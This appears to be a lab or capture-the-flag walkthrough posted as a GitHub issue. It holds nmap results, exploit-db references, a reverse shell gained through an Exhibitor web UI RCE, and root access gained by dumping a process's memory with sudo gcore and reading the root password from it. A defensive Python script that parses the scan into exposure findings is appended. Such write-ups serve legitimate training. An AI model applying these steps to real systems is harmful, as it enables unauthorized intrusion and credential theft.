WDavid404 opened this issue 4 months ago (status: open)
```text
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
139/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
631/tcp open ipp syn-ack ttl 61 CUPS 2.2
| http-methods:
| Supported Methods: GET HEAD OPTIONS POST PUT
|_ Potentially risky methods: PUT
|_http-server-header: CUPS/2.2 IPP/2.1
|_http-title: Forbidden - CUPS v2.2.10
2181/tcp open zookeeper syn-ack ttl 61 Zookeeper 3.4.6-1569965 (Built on 02/20/2014)
2222/tcp open ssh syn-ack ttl 61 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
8080/tcp open http syn-ack ttl 61 Jetty 1.0
|_http-server-header: Jetty(1.0)
|_http-title: Error 404 Not Found
8081/tcp open http syn-ack ttl 61 nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Did not follow redirect to http://192.168.203.98:8080/exhibitor/v1/ui/index.html
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
34631/tcp open java-rmi syn-ack ttl 61 Java RMI
```
Searched for exploit info for Samba smbd, ipp CUPS 2.2.10, Zookeeper 3.4, Jetty 1.0, nginx 1.14.2, java-rmi --> found:
- Samba 3.5.0 - Remote Code Execution (https://www.exploit-db.com/exploits/42060)
- Jetty Web Server - Directory Traversal (https://www.exploit-db.com/exploits/36318)
SMB
http://192.168.203.98:8080/exhibitor/v1/ui/index.html --> found Exhibitor Web UI 1.7.1 - Remote Code Execution (https://www.exploit-db.com/exploits/48654)
--> We got a reverse shell from the target host.
sudo -l
According to https://gtfobins.github.io/gtfobins/gcore/ we need to find a useful PID on the target host so we can abuse gcore.
pspy64: run sudo /usr/bin/gcore $PID
cat core.496 --> so, root's password is "UClogKingpinInning731UР"?
Oh... we can even run the strings command on the target host. strings core.496 --> the password should be "ClogKingpinInning731".
Then, su root.
Keypoints:
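As an added example (not part of the original issue or the author's notes), the script below parses the nmap output quoted above and turns it into a per-port exposure review for a defender: it records each service's version and NSE script results, then flags the "Potentially risky methods" line nmap printed for CUPS on 631/tcp, the redirect target that nginx on 8081/tcp hands out, and management services (ZooKeeper, Java RMI) that are reachable from the scanning host. The sample input is the scan output from the issue, embedded inline so it runs offline; the regexes and the `Service` dataclass are my own and assume nmap's normal-format output as shown, not any nmap library.

```python
import re
from dataclasses import dataclass, field

# Sample input: the nmap normal-format output quoted in the issue, embedded here
# so the script runs without a scanner or a network.
NMAP_OUTPUT = """\
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
139/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
631/tcp open ipp syn-ack ttl 61 CUPS 2.2
| http-methods:
| Supported Methods: GET HEAD OPTIONS POST PUT
|_ Potentially risky methods: PUT
|_http-server-header: CUPS/2.2 IPP/2.1
|_http-title: Forbidden - CUPS v2.2.10
2181/tcp open zookeeper syn-ack ttl 61 Zookeeper 3.4.6-1569965 (Built on 02/20/2014)
2222/tcp open ssh syn-ack ttl 61 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
8080/tcp open http syn-ack ttl 61 Jetty 1.0
|_http-server-header: Jetty(1.0)
|_http-title: Error 404 Not Found
8081/tcp open http syn-ack ttl 61 nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Did not follow redirect to http://192.168.203.98:8080/exhibitor/v1/ui/index.html
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
34631/tcp open java-rmi syn-ack ttl 61 Java RMI
"""

# A port line: "<port>/<proto> <state> <service> <reason [ttl N]> <version...>".
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s+(\S+(?: ttl \d+)?)\s*(.*)$")
# An NSE script header after the "|"/"|_" prefix: lowercase id, optional inline value.
# Nested result lines ("Supported Methods: ...") start with a capital and do not match.
SCRIPT_RE = re.compile(r"^([a-z][a-z0-9-]*):\s*(.*)$")

# Services that are normally reserved for an internal network (hypothetical policy list).
INTERNAL_ONLY = {"zookeeper", "java-rmi"}


@dataclass
class Service:
    port: int
    proto: str
    state: str
    name: str
    reason: str
    version: str
    scripts: dict = field(default_factory=dict)  # NSE script id -> list of result lines


def parse_nmap(text: str) -> list:
    """Parse nmap normal output into Service records with their script results."""
    services, current, current_script = [], None, None
    for raw in text.splitlines():
        line = raw.rstrip()
        m = PORT_RE.match(line)
        if m:
            current = Service(int(m.group(1)), m.group(2), m.group(3), m.group(4),
                              m.group(5), m.group(6).strip())
            services.append(current)
            current_script = None
            continue
        if current is None or not line.startswith("|"):
            continue  # header line, host banner, or text we do not model
        body = line.lstrip("|_").strip()
        sm = SCRIPT_RE.match(body)
        if sm:
            current_script = sm.group(1)
            current.scripts[current_script] = [sm.group(2)] if sm.group(2) else []
        elif current_script:
            current.scripts[current_script].append(body)
    return services


def review(services: list) -> list:
    """Produce exposure findings a defender would want to triage from the scan."""
    findings = []
    for s in services:
        label = f"{s.port}/{s.proto} ({s.version or s.name})"
        for entry in s.scripts.get("http-methods", []):
            if entry.startswith("Potentially risky methods:"):
                methods = entry.split(":", 1)[1].split()
                findings.append(f"{label}: risky HTTP methods enabled: {', '.join(methods)}")
        for entry in s.scripts.get("http-title", []):
            r = re.search(r"Did not follow redirect to (\S+)", entry)
            if r:
                findings.append(f"{label}: redirects to {r.group(1)}; review what that endpoint exposes")
        if s.name in INTERNAL_ONLY:
            findings.append(f"{label}: {s.name} reachable from the scanning host; expected to be internal-only")
    return findings


if __name__ == "__main__":
    for finding in review(parse_nmap(NMAP_OUTPUT)):
        print(finding)
```

The parser keeps nmap's own grouping (script results are attached to the port line they follow), so the same `review` function can be pointed at a fresh scan of a host to confirm that a remediation (disabling PUT, binding ZooKeeper to localhost, removing the redirect to an unauthenticated UI) actually took effect.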